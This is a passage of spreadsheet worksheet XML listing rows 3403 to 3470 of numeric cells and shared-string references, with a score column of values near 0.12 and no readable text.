        <v>1.2782006E7</v>
      </c>
      <c r="C3403" s="5" t="s">
        <v>3208</v>
      </c>
      <c r="D3403" s="2">
        <v>1.0</v>
      </c>
      <c r="E3403" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3403" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3404" ht="15.75" customHeight="1">
      <c r="A3404" s="1">
        <v>25440.0</v>
      </c>
      <c r="B3404" s="2">
        <v>1.38746E7</v>
      </c>
      <c r="C3404" s="2" t="s">
        <v>3209</v>
      </c>
      <c r="D3404" s="2">
        <v>1.0</v>
      </c>
      <c r="E3404" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3404" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3405" ht="15.75" customHeight="1">
      <c r="A3405" s="1">
        <v>27113.0</v>
      </c>
      <c r="B3405" s="2">
        <v>2.0631345E7</v>
      </c>
      <c r="C3405" s="2" t="s">
        <v>3210</v>
      </c>
      <c r="D3405" s="2">
        <v>1.0</v>
      </c>
      <c r="E3405" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3405" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3406" ht="15.75" customHeight="1">
      <c r="A3406" s="1">
        <v>28666.0</v>
      </c>
      <c r="B3406" s="2">
        <v>2.7434373E7</v>
      </c>
      <c r="C3406" s="2" t="s">
        <v>3211</v>
      </c>
      <c r="D3406" s="2">
        <v>1.0</v>
      </c>
      <c r="E3406" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3406" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3407" ht="15.75" customHeight="1">
      <c r="A3407" s="1">
        <v>28973.0</v>
      </c>
      <c r="B3407" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C3407" s="2" t="s">
        <v>3212</v>
      </c>
      <c r="D3407" s="2">
        <v>1.0</v>
      </c>
      <c r="E3407" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3407" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="3408" ht="15.75" customHeight="1">
      <c r="A3408" s="1">
        <v>2324.0</v>
      </c>
      <c r="B3408" s="2">
        <v>3.2901783E7</v>
      </c>
      <c r="C3408" s="2" t="s">
        <v>3213</v>
      </c>
      <c r="D3408" s="2">
        <v>1.0</v>
      </c>
      <c r="E3408" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3408" s="2">
        <v>0.1233660130718955</v>
      </c>
    </row>
    <row r="3409" ht="15.75" customHeight="1">
      <c r="A3409" s="1">
        <v>10842.0</v>
      </c>
      <c r="B3409" s="2">
        <v>1.6084181E7</v>
      </c>
      <c r="C3409" s="2" t="s">
        <v>3214</v>
      </c>
      <c r="D3409" s="2">
        <v>1.0</v>
      </c>
      <c r="E3409" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3409" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="3410" ht="15.75" customHeight="1">
      <c r="A3410" s="1">
        <v>12065.0</v>
      </c>
      <c r="B3410" s="2">
        <v>2.6568738E7</v>
      </c>
      <c r="C3410" s="2" t="s">
        <v>3215</v>
      </c>
      <c r="D3410" s="2">
        <v>1.0</v>
      </c>
      <c r="E3410" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3410" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="3411" ht="15.75" customHeight="1">
      <c r="A3411" s="1">
        <v>20206.0</v>
      </c>
      <c r="B3411" s="2">
        <v>1.0641135E7</v>
      </c>
      <c r="C3411" s="2" t="s">
        <v>3216</v>
      </c>
      <c r="D3411" s="2">
        <v>1.0</v>
      </c>
      <c r="E3411" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3411" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="3412" ht="15.75" customHeight="1">
      <c r="A3412" s="1">
        <v>12991.0</v>
      </c>
      <c r="B3412" s="2">
        <v>3.2744054E7</v>
      </c>
      <c r="C3412" s="2" t="s">
        <v>3217</v>
      </c>
      <c r="D3412" s="2">
        <v>1.0</v>
      </c>
      <c r="E3412" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3412" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="3413" ht="15.75" customHeight="1">
      <c r="A3413" s="1">
        <v>13939.0</v>
      </c>
      <c r="B3413" s="2">
        <v>3.7169808E7</v>
      </c>
      <c r="C3413" s="2" t="s">
        <v>3218</v>
      </c>
      <c r="D3413" s="2">
        <v>1.0</v>
      </c>
      <c r="E3413" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3413" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="3414" ht="15.75" customHeight="1">
      <c r="A3414" s="1">
        <v>25832.0</v>
      </c>
      <c r="B3414" s="2">
        <v>1.4778692E7</v>
      </c>
      <c r="C3414" s="2" t="s">
        <v>2809</v>
      </c>
      <c r="D3414" s="2">
        <v>1.0</v>
      </c>
      <c r="E3414" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3414" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="3415" ht="15.75" customHeight="1">
      <c r="A3415" s="1">
        <v>32719.0</v>
      </c>
      <c r="B3415" s="2">
        <v>5981009.0</v>
      </c>
      <c r="C3415" s="2" t="s">
        <v>3219</v>
      </c>
      <c r="D3415" s="2">
        <v>1.0</v>
      </c>
      <c r="E3415" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3415" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="3416" ht="15.75" customHeight="1">
      <c r="A3416" s="1">
        <v>13072.0</v>
      </c>
      <c r="B3416" s="2">
        <v>3.3332127E7</v>
      </c>
      <c r="C3416" s="2" t="s">
        <v>3220</v>
      </c>
      <c r="D3416" s="2">
        <v>1.0</v>
      </c>
      <c r="E3416" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3416" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="3417" ht="15.75" customHeight="1">
      <c r="A3417" s="1">
        <v>17294.0</v>
      </c>
      <c r="B3417" s="2">
        <v>4.9256351E7</v>
      </c>
      <c r="C3417" s="2" t="s">
        <v>3221</v>
      </c>
      <c r="D3417" s="2">
        <v>1.0</v>
      </c>
      <c r="E3417" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3417" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="3418" ht="15.75" customHeight="1">
      <c r="A3418" s="1">
        <v>34242.0</v>
      </c>
      <c r="B3418" s="2">
        <v>4731363.0</v>
      </c>
      <c r="C3418" s="2" t="s">
        <v>3222</v>
      </c>
      <c r="D3418" s="2">
        <v>1.0</v>
      </c>
      <c r="E3418" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3418" s="2">
        <v>0.1225749559082893</v>
      </c>
    </row>
    <row r="3419" ht="15.75" customHeight="1">
      <c r="A3419" s="1">
        <v>32201.0</v>
      </c>
      <c r="B3419" s="2">
        <v>5.4770422E7</v>
      </c>
      <c r="C3419" s="2" t="s">
        <v>3223</v>
      </c>
      <c r="D3419" s="2">
        <v>1.0</v>
      </c>
      <c r="E3419" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3419" s="2">
        <v>0.1225749559082892</v>
      </c>
    </row>
    <row r="3420" ht="15.75" customHeight="1">
      <c r="A3420" s="1">
        <v>4742.0</v>
      </c>
      <c r="B3420" s="2">
        <v>4336871.0</v>
      </c>
      <c r="C3420" s="2" t="s">
        <v>3224</v>
      </c>
      <c r="D3420" s="2">
        <v>1.0</v>
      </c>
      <c r="E3420" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3420" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="3421" ht="15.75" customHeight="1">
      <c r="A3421" s="1">
        <v>8194.0</v>
      </c>
      <c r="B3421" s="2">
        <v>5.3253854E7</v>
      </c>
      <c r="C3421" s="2" t="s">
        <v>3225</v>
      </c>
      <c r="D3421" s="2">
        <v>1.0</v>
      </c>
      <c r="E3421" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3421" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="3422" ht="15.75" customHeight="1">
      <c r="A3422" s="1">
        <v>15418.0</v>
      </c>
      <c r="B3422" s="2">
        <v>4.2886131E7</v>
      </c>
      <c r="C3422" s="2" t="s">
        <v>3226</v>
      </c>
      <c r="D3422" s="2">
        <v>1.0</v>
      </c>
      <c r="E3422" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3422" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="3423" ht="15.75" customHeight="1">
      <c r="A3423" s="1">
        <v>19287.0</v>
      </c>
      <c r="B3423" s="2">
        <v>5.5178863E7</v>
      </c>
      <c r="C3423" s="2" t="s">
        <v>3227</v>
      </c>
      <c r="D3423" s="2">
        <v>1.0</v>
      </c>
      <c r="E3423" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3423" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="3424" ht="15.75" customHeight="1">
      <c r="A3424" s="1">
        <v>24826.0</v>
      </c>
      <c r="B3424" s="2">
        <v>1.2123089E7</v>
      </c>
      <c r="C3424" s="2" t="s">
        <v>3228</v>
      </c>
      <c r="D3424" s="2">
        <v>1.0</v>
      </c>
      <c r="E3424" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3424" s="2">
        <v>0.1223958333333334</v>
      </c>
    </row>
    <row r="3425" ht="15.75" customHeight="1">
      <c r="A3425" s="1">
        <v>71.0</v>
      </c>
      <c r="B3425" s="2">
        <v>1.1669891E7</v>
      </c>
      <c r="C3425" s="2" t="s">
        <v>3229</v>
      </c>
      <c r="D3425" s="2">
        <v>1.0</v>
      </c>
      <c r="E3425" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3425" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="3426" ht="15.75" customHeight="1">
      <c r="A3426" s="1">
        <v>9233.0</v>
      </c>
      <c r="B3426" s="2">
        <v>5.5456818E7</v>
      </c>
      <c r="C3426" s="2" t="s">
        <v>3230</v>
      </c>
      <c r="D3426" s="2">
        <v>1.0</v>
      </c>
      <c r="E3426" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3426" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="3427" ht="15.75" customHeight="1">
      <c r="A3427" s="1">
        <v>13870.0</v>
      </c>
      <c r="B3427" s="2">
        <v>3.6955623E7</v>
      </c>
      <c r="C3427" s="2" t="s">
        <v>3231</v>
      </c>
      <c r="D3427" s="2">
        <v>1.0</v>
      </c>
      <c r="E3427" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3427" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="3428" ht="15.75" customHeight="1">
      <c r="A3428" s="1">
        <v>17470.0</v>
      </c>
      <c r="B3428" s="2">
        <v>4.9898918E7</v>
      </c>
      <c r="C3428" s="2" t="s">
        <v>3232</v>
      </c>
      <c r="D3428" s="2">
        <v>1.0</v>
      </c>
      <c r="E3428" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3428" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="3429" ht="15.75" customHeight="1">
      <c r="A3429" s="1">
        <v>26867.0</v>
      </c>
      <c r="B3429" s="2">
        <v>1.9080384E7</v>
      </c>
      <c r="C3429" s="2" t="s">
        <v>3233</v>
      </c>
      <c r="D3429" s="2">
        <v>1.0</v>
      </c>
      <c r="E3429" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3429" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="3430" ht="15.75" customHeight="1">
      <c r="A3430" s="1">
        <v>4712.0</v>
      </c>
      <c r="B3430" s="2">
        <v>4.3287622E7</v>
      </c>
      <c r="C3430" s="2" t="s">
        <v>3234</v>
      </c>
      <c r="D3430" s="2">
        <v>1.0</v>
      </c>
      <c r="E3430" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3430" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3431" ht="15.75" customHeight="1">
      <c r="A3431" s="1">
        <v>6873.0</v>
      </c>
      <c r="B3431" s="2">
        <v>4.9694538E7</v>
      </c>
      <c r="C3431" s="2" t="s">
        <v>3235</v>
      </c>
      <c r="D3431" s="2">
        <v>1.0</v>
      </c>
      <c r="E3431" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3431" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3432" ht="15.75" customHeight="1">
      <c r="A3432" s="1">
        <v>11546.0</v>
      </c>
      <c r="B3432" s="2">
        <v>2.2651781E7</v>
      </c>
      <c r="C3432" s="2" t="s">
        <v>3236</v>
      </c>
      <c r="D3432" s="2">
        <v>1.0</v>
      </c>
      <c r="E3432" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3432" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3433" ht="15.75" customHeight="1">
      <c r="A3433" s="1">
        <v>11683.0</v>
      </c>
      <c r="B3433" s="2">
        <v>2.3444499E7</v>
      </c>
      <c r="C3433" s="2" t="s">
        <v>3237</v>
      </c>
      <c r="D3433" s="2">
        <v>1.0</v>
      </c>
      <c r="E3433" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3433" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3434" ht="15.75" customHeight="1">
      <c r="A3434" s="1">
        <v>12187.0</v>
      </c>
      <c r="B3434" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C3434" s="2" t="s">
        <v>3238</v>
      </c>
      <c r="D3434" s="2">
        <v>1.0</v>
      </c>
      <c r="E3434" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3434" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3435" ht="15.75" customHeight="1">
      <c r="A3435" s="1">
        <v>12524.0</v>
      </c>
      <c r="B3435" s="2">
        <v>2.9712066E7</v>
      </c>
      <c r="C3435" s="2" t="s">
        <v>3239</v>
      </c>
      <c r="D3435" s="2">
        <v>1.0</v>
      </c>
      <c r="E3435" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3435" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3436" ht="15.75" customHeight="1">
      <c r="A3436" s="1">
        <v>13680.0</v>
      </c>
      <c r="B3436" s="2">
        <v>3.6061434E7</v>
      </c>
      <c r="C3436" s="2" t="s">
        <v>3240</v>
      </c>
      <c r="D3436" s="2">
        <v>1.0</v>
      </c>
      <c r="E3436" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3436" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3437" ht="15.75" customHeight="1">
      <c r="A3437" s="1">
        <v>15926.0</v>
      </c>
      <c r="B3437" s="2">
        <v>4.4696906E7</v>
      </c>
      <c r="C3437" s="2" t="s">
        <v>3241</v>
      </c>
      <c r="D3437" s="2">
        <v>1.0</v>
      </c>
      <c r="E3437" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3437" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3438" ht="15.75" customHeight="1">
      <c r="A3438" s="1">
        <v>18433.0</v>
      </c>
      <c r="B3438" s="2">
        <v>5.2722024E7</v>
      </c>
      <c r="C3438" s="2" t="s">
        <v>3242</v>
      </c>
      <c r="D3438" s="2">
        <v>1.0</v>
      </c>
      <c r="E3438" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3438" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3439" ht="15.75" customHeight="1">
      <c r="A3439" s="1">
        <v>24332.0</v>
      </c>
      <c r="B3439" s="2">
        <v>1.0671858E7</v>
      </c>
      <c r="C3439" s="2" t="s">
        <v>3243</v>
      </c>
      <c r="D3439" s="2">
        <v>1.0</v>
      </c>
      <c r="E3439" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3439" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3440" ht="15.75" customHeight="1">
      <c r="A3440" s="1">
        <v>29469.0</v>
      </c>
      <c r="B3440" s="2">
        <v>3.2364429E7</v>
      </c>
      <c r="C3440" s="2" t="s">
        <v>3084</v>
      </c>
      <c r="D3440" s="2">
        <v>1.0</v>
      </c>
      <c r="E3440" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3440" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="3441" ht="15.75" customHeight="1">
      <c r="A3441" s="1">
        <v>4892.0</v>
      </c>
      <c r="B3441" s="2">
        <v>4.3869659E7</v>
      </c>
      <c r="C3441" s="2" t="s">
        <v>3244</v>
      </c>
      <c r="D3441" s="2">
        <v>1.0</v>
      </c>
      <c r="E3441" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3441" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="3442" ht="15.75" customHeight="1">
      <c r="A3442" s="1">
        <v>14802.0</v>
      </c>
      <c r="B3442" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C3442" s="2" t="s">
        <v>3245</v>
      </c>
      <c r="D3442" s="2">
        <v>1.0</v>
      </c>
      <c r="E3442" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3442" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="3443" ht="15.75" customHeight="1">
      <c r="A3443" s="1">
        <v>5771.0</v>
      </c>
      <c r="B3443" s="2">
        <v>4.6706311E7</v>
      </c>
      <c r="C3443" s="2" t="s">
        <v>3246</v>
      </c>
      <c r="D3443" s="2">
        <v>1.0</v>
      </c>
      <c r="E3443" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3443" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="3444" ht="15.75" customHeight="1">
      <c r="A3444" s="1">
        <v>8297.0</v>
      </c>
      <c r="B3444" s="2">
        <v>5.3547919E7</v>
      </c>
      <c r="C3444" s="2" t="s">
        <v>3247</v>
      </c>
      <c r="D3444" s="2">
        <v>1.0</v>
      </c>
      <c r="E3444" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3444" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="3445" ht="15.75" customHeight="1">
      <c r="A3445" s="1">
        <v>12814.0</v>
      </c>
      <c r="B3445" s="2">
        <v>3.1577918E7</v>
      </c>
      <c r="C3445" s="2" t="s">
        <v>3248</v>
      </c>
      <c r="D3445" s="2">
        <v>1.0</v>
      </c>
      <c r="E3445" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3445" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="3446" ht="15.75" customHeight="1">
      <c r="A3446" s="1">
        <v>17030.0</v>
      </c>
      <c r="B3446" s="2">
        <v>4.8484129E7</v>
      </c>
      <c r="C3446" s="2" t="s">
        <v>3249</v>
      </c>
      <c r="D3446" s="2">
        <v>1.0</v>
      </c>
      <c r="E3446" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3446" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="3447" ht="15.75" customHeight="1">
      <c r="A3447" s="1">
        <v>33625.0</v>
      </c>
      <c r="B3447" s="2">
        <v>8356081.0</v>
      </c>
      <c r="C3447" s="2" t="s">
        <v>3250</v>
      </c>
      <c r="D3447" s="2">
        <v>1.0</v>
      </c>
      <c r="E3447" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3447" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="3448" ht="15.75" customHeight="1">
      <c r="A3448" s="1">
        <v>1528.0</v>
      </c>
      <c r="B3448" s="2">
        <v>2.7434144E7</v>
      </c>
      <c r="C3448" s="2" t="s">
        <v>3251</v>
      </c>
      <c r="D3448" s="2">
        <v>1.0</v>
      </c>
      <c r="E3448" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3448" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="3449" ht="15.75" customHeight="1">
      <c r="A3449" s="1">
        <v>6137.0</v>
      </c>
      <c r="B3449" s="2">
        <v>4.781831E7</v>
      </c>
      <c r="C3449" s="2" t="s">
        <v>3252</v>
      </c>
      <c r="D3449" s="2">
        <v>1.0</v>
      </c>
      <c r="E3449" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3449" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="3450" ht="15.75" customHeight="1">
      <c r="A3450" s="1">
        <v>15038.0</v>
      </c>
      <c r="B3450" s="2">
        <v>4.1568833E7</v>
      </c>
      <c r="C3450" s="2" t="s">
        <v>3253</v>
      </c>
      <c r="D3450" s="2">
        <v>1.0</v>
      </c>
      <c r="E3450" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3450" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="3451" ht="15.75" customHeight="1">
      <c r="A3451" s="1">
        <v>15385.0</v>
      </c>
      <c r="B3451" s="2">
        <v>4.2779496E7</v>
      </c>
      <c r="C3451" s="2" t="s">
        <v>3254</v>
      </c>
      <c r="D3451" s="2">
        <v>1.0</v>
      </c>
      <c r="E3451" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3451" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="3452" ht="15.75" customHeight="1">
      <c r="A3452" s="1">
        <v>2724.0</v>
      </c>
      <c r="B3452" s="2">
        <v>3.494083E7</v>
      </c>
      <c r="C3452" s="2" t="s">
        <v>3255</v>
      </c>
      <c r="D3452" s="2">
        <v>1.0</v>
      </c>
      <c r="E3452" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3452" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="3453" ht="15.75" customHeight="1">
      <c r="A3453" s="1">
        <v>7003.0</v>
      </c>
      <c r="B3453" s="2">
        <v>5.0082601E7</v>
      </c>
      <c r="C3453" s="2" t="s">
        <v>3256</v>
      </c>
      <c r="D3453" s="2">
        <v>1.0</v>
      </c>
      <c r="E3453" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3453" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="3454" ht="15.75" customHeight="1">
      <c r="A3454" s="1">
        <v>7132.0</v>
      </c>
      <c r="B3454" s="2">
        <v>5.0436216E7</v>
      </c>
      <c r="C3454" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="D3454" s="2">
        <v>1.0</v>
      </c>
      <c r="E3454" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3454" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="3455" ht="15.75" customHeight="1">
      <c r="A3455" s="1">
        <v>10000.0</v>
      </c>
      <c r="B3455" s="2">
        <v>5.7007343E7</v>
      </c>
      <c r="C3455" s="2" t="s">
        <v>3258</v>
      </c>
      <c r="D3455" s="2">
        <v>1.0</v>
      </c>
      <c r="E3455" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3455" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="3456" ht="15.75" customHeight="1">
      <c r="A3456" s="1">
        <v>10693.0</v>
      </c>
      <c r="B3456" s="2">
        <v>1.4778858E7</v>
      </c>
      <c r="C3456" s="2" t="s">
        <v>3259</v>
      </c>
      <c r="D3456" s="2">
        <v>1.0</v>
      </c>
      <c r="E3456" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3456" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="3457" ht="15.75" customHeight="1">
      <c r="A3457" s="1">
        <v>11807.0</v>
      </c>
      <c r="B3457" s="2">
        <v>2.4434537E7</v>
      </c>
      <c r="C3457" s="2" t="s">
        <v>3260</v>
      </c>
      <c r="D3457" s="2">
        <v>1.0</v>
      </c>
      <c r="E3457" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3457" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="3458" ht="15.75" customHeight="1">
      <c r="A3458" s="1">
        <v>13494.0</v>
      </c>
      <c r="B3458" s="2">
        <v>3.5402395E7</v>
      </c>
      <c r="C3458" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="D3458" s="2">
        <v>1.0</v>
      </c>
      <c r="E3458" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3458" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="3459" ht="15.75" customHeight="1">
      <c r="A3459" s="1">
        <v>16907.0</v>
      </c>
      <c r="B3459" s="2">
        <v>4.8120457E7</v>
      </c>
      <c r="C3459" s="2" t="s">
        <v>3262</v>
      </c>
      <c r="D3459" s="2">
        <v>1.0</v>
      </c>
      <c r="E3459" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3459" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="3460" ht="15.75" customHeight="1">
      <c r="A3460" s="1">
        <v>17274.0</v>
      </c>
      <c r="B3460" s="2">
        <v>4.9182792E7</v>
      </c>
      <c r="C3460" s="2" t="s">
        <v>3263</v>
      </c>
      <c r="D3460" s="2">
        <v>1.0</v>
      </c>
      <c r="E3460" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3460" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="3461" ht="15.75" customHeight="1">
      <c r="A3461" s="1">
        <v>12351.0</v>
      </c>
      <c r="B3461" s="2">
        <v>2.8677093E7</v>
      </c>
      <c r="C3461" s="2" t="s">
        <v>3264</v>
      </c>
      <c r="D3461" s="2">
        <v>1.0</v>
      </c>
      <c r="E3461" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3461" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="3462" ht="15.75" customHeight="1">
      <c r="A3462" s="1">
        <v>16660.0</v>
      </c>
      <c r="B3462" s="2">
        <v>4.7229345E7</v>
      </c>
      <c r="C3462" s="2" t="s">
        <v>3265</v>
      </c>
      <c r="D3462" s="2">
        <v>1.0</v>
      </c>
      <c r="E3462" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3462" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="3463" ht="15.75" customHeight="1">
      <c r="A3463" s="1">
        <v>19394.0</v>
      </c>
      <c r="B3463" s="2">
        <v>5.5565715E7</v>
      </c>
      <c r="C3463" s="2" t="s">
        <v>3266</v>
      </c>
      <c r="D3463" s="2">
        <v>1.0</v>
      </c>
      <c r="E3463" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3463" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="3464" ht="15.75" customHeight="1">
      <c r="A3464" s="1">
        <v>32433.0</v>
      </c>
      <c r="B3464" s="2">
        <v>5655084.0</v>
      </c>
      <c r="C3464" s="2" t="s">
        <v>3267</v>
      </c>
      <c r="D3464" s="2">
        <v>1.0</v>
      </c>
      <c r="E3464" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3464" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="3465" ht="15.75" customHeight="1">
      <c r="A3465" s="1">
        <v>1412.0</v>
      </c>
      <c r="B3465" s="2">
        <v>2.6455199E7</v>
      </c>
      <c r="C3465" s="2" t="s">
        <v>3268</v>
      </c>
      <c r="D3465" s="2">
        <v>1.0</v>
      </c>
      <c r="E3465" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3465" s="2">
        <v>0.1215780998389694</v>
      </c>
    </row>
    <row r="3466" ht="15.75" customHeight="1">
      <c r="A3466" s="1">
        <v>632.0</v>
      </c>
      <c r="B3466" s="2">
        <v>1.9687606E7</v>
      </c>
      <c r="C3466" s="2" t="s">
        <v>3269</v>
      </c>
      <c r="D3466" s="2">
        <v>1.0</v>
      </c>
      <c r="E3466" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3466" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3467" ht="15.75" customHeight="1">
      <c r="A3467" s="1">
        <v>2961.0</v>
      </c>
      <c r="B3467" s="2">
        <v>3.6067643E7</v>
      </c>
      <c r="C3467" s="2" t="s">
        <v>3270</v>
      </c>
      <c r="D3467" s="2">
        <v>1.0</v>
      </c>
      <c r="E3467" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3467" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3468" ht="15.75" customHeight="1">
      <c r="A3468" s="1">
        <v>4500.0</v>
      </c>
      <c r="B3468" s="2">
        <v>4.2572967E7</v>
      </c>
      <c r="C3468" s="2" t="s">
        <v>3271</v>
      </c>
      <c r="D3468" s="2">
        <v>1.0</v>
      </c>
      <c r="E3468" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3468" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3469" ht="15.75" customHeight="1">
      <c r="A3469" s="1">
        <v>4985.0</v>
      </c>
      <c r="B3469" s="2">
        <v>4.412795E7</v>
      </c>
      <c r="C3469" s="2" t="s">
        <v>3272</v>
      </c>
      <c r="D3469" s="2">
        <v>1.0</v>
      </c>
      <c r="E3469" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3469" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3470" ht="15.75" customHeight="1">
      <c r="A3470" s="1">
        <v>5020.0</v>
      </c>
      <c r="B3470" s="2">
        <v>4.4223563E7</v>
